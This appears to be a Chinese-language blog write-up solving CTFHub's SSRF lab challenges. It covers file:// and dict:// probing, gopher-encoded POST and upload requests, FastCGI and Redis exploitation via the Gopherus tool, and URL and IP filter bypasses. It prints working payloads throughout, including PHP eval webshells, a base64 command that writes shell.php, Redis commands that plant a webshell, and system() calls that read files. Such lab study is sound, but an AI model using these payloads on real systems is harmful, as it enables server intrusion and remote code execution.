基础知识
内网访问
题目描述:尝试访问位于127.0.0.1的flag.php吧
访问靶机地址,发现url后面多了/?url=_
然后访问127.0.0.1/flag.php
Payload: ?url=127.0.0.1/flag.php
本题源码:
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
伪协议读取文件
题目描述:尝试去读取一下Web目录下的flag.php吧
在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。
本题源码index.php
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Payload: ?url=file:///var/www/html/flag.php
然后查看源代码
端口扫描
题目描述:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
使用SSRF中的dict协议可以用来探测开放的端口
Payload: ?url=dict://127.0.0.1:8000
利用burpsuite对端口进行爆破
提示端口号在8000-9000
发现8566端口长度与其他端口不一样
然后访问8566端口
Payload: ?url=127.0.0.1:8566
本题源码
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
header("Tips: Port = [8000,9000)");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Gopher协议的利用
POST请求
题目描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年
根据提示抓包访问302.php,无服务
尝试访问flag.php
内网访问flag.php,发现了key=e42236c6f932a86af6eaa1f0ca77e0de
?url=127.0.0.1/flag.php
需要我们用gopher协议去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。使用方法:gopher://ip:port/_payload
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=e42236c6f932a86af6eaa1f0ca77e0de
#注意Content-Length那里,必须和你的POST请求长度一样
URL编码,进行url三次编码即(注:第一次url编码后要手动在所有%0A前面加上%0D,再进行后续编码)
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de
构造Payload:
?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de
得到flag
利用gopher协议构造post请求脚本如下:
import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=e42236c6f932a86af6eaa1f0ca77e0de
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result) # 这里因为是GET请求所以要进行两次url编码
得到
gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253De42236c6f932a86af6eaa1f0ca77e0de%250D%250A
上传文件
参考文章:https://www.jianshu.com/p/a9e5a64b733b
题目描述:这次需要上传一个文件到flag.php了.祝你好运
访问靶机地址,一片空白,尝试访问flag.php,提示需要从本地访问
从目标机本地访问flag.php:
?url=127.0.0.1/flag.php
得到文件上传的页面:
使用伪协议读取flag.php的源码
Payload: ?url=file:///var/www/html/flag.php
flag.php
<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
echo "Just View From 127.0.0.1";
return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
echo getenv("CTFHUB");
exit;
}
?>
发现会判断文件是否为空, 上传一个非空文件,没有提交选项,F12手动添加提交框:
<input type="submit" name="submit" >
得到
上传文件,bp拦截
将Host的值改为127.0.0.1:80,然后将上面的包进行第一次url编码,然后把%0A改成%0D%0A,然后再进行两次url编码。拿脚本梭
import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------92335795416210780092655892737
Content-Length: 395
Origin: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1
-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
<?php
@eval($_POST["pass"]);
?>
-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="submit"
提交查询
-----------------------------92335795416210780092655892737--
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result) # 这里因为是GET请求所以要进行两次url编码
输出结果如下:
gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A90.0%2529%2520Gecko/20100101%2520Firefox/90.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------340238428019634687501146349694%250D%250AContent-Length%253A%2520394%250D%250AOrigin%253A%2520http%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------340238428019634687501146349694%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%250D%250A%2520%2520%2520%2520%2540eval%2528%2524_POST%255B%2522pass%2522%255D%2529%253B%250D%250A%253F%253E%2520%250D%250A-----------------------------340238428019634687501146349694%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------340238428019634687501146349694--%250D%250A
传参得到flag
FastCGI协议
题目描述:这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助
Gopherus工具:https://github.com/tarunkant/Gopherus.git
参考:https://blog.csdn.net/mysteryflower/article/details/94386461
如果端口9000是开放的,则SSRF漏洞可能存在并且可能导致RCE。为了利用它,您需要提供一个目标主机上必须存在的文件名(首选.php)。
?url=file:///var/www/html/index.php
?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
目标服务器上存在/var/www/html/index.php。
准备一句话木马:<?php @eval($_POST['x']);?>,保存在文件tmp.php中
构造要执行的终端命令:对一句话木马进行解码,并写入到名为shell.php的文件中。
echo “PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==” | base64 -d > shell.php
使用Gopherus工具生成payload
┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit fastcgi 2 ⨯
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one: /var/www/html/index.php
Terminal command to run: echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php
Your gopher link is ready to do SSRF:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH119%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00w%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg%3D%3D%22%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
-----------Made-by-SpyD3r-----------
url编码一下,url传参
?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%39%30%30%30%2f%5f%25%30%31%25%30%31%25%30%30%25%30%31%25%30%30%25%30%38%25%30%30%25%30%30%25%30%30%25%30%31%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%34%25%30%30%25%30%31%25%30%31%25%30%35%25%30%35%25%30%30%25%30%46%25%31%30%53%45%52%56%45%52%5f%53%4f%46%54%57%41%52%45%67%6f%25%32%30%2f%25%32%30%66%63%67%69%63%6c%69%65%6e%74%25%32%30%25%30%42%25%30%39%52%45%4d%4f%54%45%5f%41%44%44%52%31%32%37%2e%30%2e%30%2e%31%25%30%46%25%30%38%53%45%52%56%45%52%5f%50%52%4f%54%4f%43%4f%4c%48%54%54%50%2f%31%2e%31%25%30%45%25%30%33%43%4f%4e%54%45%4e%54%5f%4c%45%4e%47%54%48%31%32%33%25%30%45%25%30%34%52%45%51%55%45%53%54%5f%4d%45%54%48%4f%44%50%4f%53%54%25%30%39%4b%50%48%50%5f%56%41%4c%55%45%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%25%32%30%25%33%44%25%32%30%4f%6e%25%30%41%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%25%32%30%25%33%44%25%32%30%25%30%41%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%25%32%30%25%33%44%25%32%30%70%68%70%25%33%41%2f%2f%69%6e%70%75%74%25%30%46%25%31%37%53%43%52%49%50%54%5f%46%49%4c%45%4e%41%4d%45%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78%2e%70%68%70%25%30%44%25%30%31%44%4f%43%55%4d%45%4e%54%5f%52%4f%4f%54%2f%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%34%25%30%30%25%30%31%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%35%25%30%30%25%30%31%25%30%30%25%37%42%25%30%34%25%30%30%25%33%43%25%33%46%70%68%70%25%32%30%73%79%73%74%65%6d%25%32%38%25%32%37%65%63%68%6f%25%32%30%25%32%32%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6f%4a%46%39%51%54%31%4e%55%57%79%64%34%4a%31%30%70%4f%7a%38%25%32%42%43%67%25%33%44%25%33%44%25%32%32%25%32%30%25%37%43%25%32%30%62%61%73%65%36%34%25%32%30%2d%64%25%32%30%25%33%45%25%32%30%73%68%65%6c%6c%2e%70%68%70%25%32%37%25%32%39%25%33%42%64%69%65%25%32%38%25%32%37%2d%2d%2d%2d%2d%4d%61%64%65%2d%62%79%2d%53%70%79%44%33%72%2d%2d%2d%2d%2d%25%30%41%25%32%37%25%32%39%25%33%42%25%33%46%25%33%45%25%30%30%25%30%30%25%30%30%25%30%30
shell.php已经被写入到服务器的/var/www/html目录下
/shell.php
x=system('cat /flag_bb4ae17f50829d327b60b4f752bc438d');
ctfhub{e028c80e91de1a8e7220d506}
Redis协议
这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!
Redis系列漏洞总结:https://www.freebuf.com/articles/web/249238.html
主要利用redis未授权访问,如:写ssh-keygen公钥登录,利用计划任务反弹shell,直接写webshell等,主从复制getshell。
方法一:手打
首先用dict协议探测一下是否在6379端口:
url=dict://127.0.0.1:6379
看一下要不要认证:
url=dict://127.0.0.1:6379/info
发现存在,下一步设置本地存放dir:
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html
然后开始写马,一般用十六进制
url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php @eval($_POST[a]);?>
url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php eval($_POST[a]);?>
设置文件名
url=dict://127.0.0.1:6379/set:dbfilename:atkx.php
最后保存
url=dict://127.0.0.1:6379/save
这题好像行不通,一直复现不成功,而ctfshow web360两种方法都行
方法二:工具梭哈
┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit redis
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Ready To get SHELL
What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[atkx]); ?>
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Batkx%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
-----------Made-by-SpyD3r-----------
再编码一下
?url=gopher://127.0.0.1:6379/_%25%32%41%31%25%30%44%25%30%41%25%32%34%38%25%30%44%25%30%41%66%6c%75%73%68%61%6c%6c%25%30%44%25%30%41%25%32%41%33%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%25%30%44%25%30%41%31%25%30%44%25%30%41%25%32%34%33%32%25%30%44%25%30%41%25%30%41%25%30%41%25%33%43%25%33%46%70%68%70%25%32%30%65%76%61%6c%25%32%38%25%32%34%5f%50%4f%53%54%25%35%42%61%74%6b%78%25%35%44%25%32%39%25%33%42%25%32%30%25%33%46%25%33%45%25%30%41%25%30%41%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%64%69%72%25%30%44%25%30%41%25%32%34%31%33%25%30%44%25%30%41%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%30%25%30%44%25%30%41%64%62%66%69%6c%65%6e%61%6d%65%25%30%44%25%30%41%25%32%34%39%25%30%44%25%30%41%73%68%65%6c%6c%2e%70%68%70%25%30%44%25%30%41%25%32%41%31%25%30%44%25%30%41%25%32%34%34%25%30%44%25%30%41%73%61%76%65%25%30%44%25%30%41%25%30%41
连接🐎
/shell.php
atkx=system('cat /flag_56381dbdb8879c071fdbd8b47e044436');
ctfhub{3f364bbf61aa400455122885}
Bypass
URL Bypass
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧
方法:
1.利用?绕过限制url=https://www.baidu.com?www.xxxx.me
2.利用@绕过限制url=https://www.baidu.com@www.xxxx.me
3.利用斜杠反斜杠绕过限制
4.利用#绕过限制url=https://www.baidu.com#www.xxxx.me
5.利用子域名绕过
6.利用畸形url绕过
7.利用跳转ip绕过
题目要求url must startwith “http://notfound.ctfhub.com”
我们可以利用@来绕过,如 http://whoami@127.0.0.1实际上是以用户名 whoami 连接到站点127.0.0.1,即 http://notfound.ctfhub.com@127.0.0.1与 http://127.0.0.1请求是相同的,该请求得到的内容都是127.0.0.1的内容。
所以直接构造,成功得到flag。
?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
ctfhub{b808a23b0267eb37a9cf2d47}
数字IP Bypass
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢
?url=http://127.0.0.1/flag.php
127被ban了,利用进制绕过
127.0.0.1
十进制:2130706433
十六进制 = 0x7F000001
payload:
?url=http://2130706433/flag.php
?url=http://0x7F000001/flag.php
ctfhub{6c7da22b915e514a2166ebc8}
302跳转 Bypass
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧
没有vps,在BUU开个靶机,然后在/var/www/html目录下创建ssrf.php
<?php
header("Location: http://127.0.0.1/flag.php");
?>
然后payload写访问文件的地址
?url=http://challenge-ecc5d8e674ef2aa4.sandbox.ctfhub.com:10800/?url=http://54899ba5-ce14-4afa-a744-c342f2cc5361.node4.buuoj.cn:81/ssrf.php
ctfhub{44d10798e3a02163751e39ee}
DNS重绑定 Bypass
在这个网站注册一个账号http://ceye.io/,然后会给你分配一个域名,修改成如下的内容,第一个随便天填,第二个写
浅谈DNS重绑定漏洞:https://zhuanlan.zhihu.com/p/89426041
配置一下
然后使用域名
Payload:url=http://r.xxxxxx/flag.php
#xxx为分给你的域名
ctfhub{89904fb53a36e3df04691243}
参考文章:
我在CTFHub学习SSRF
SSRF的利用方式
扫一扫
1045
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
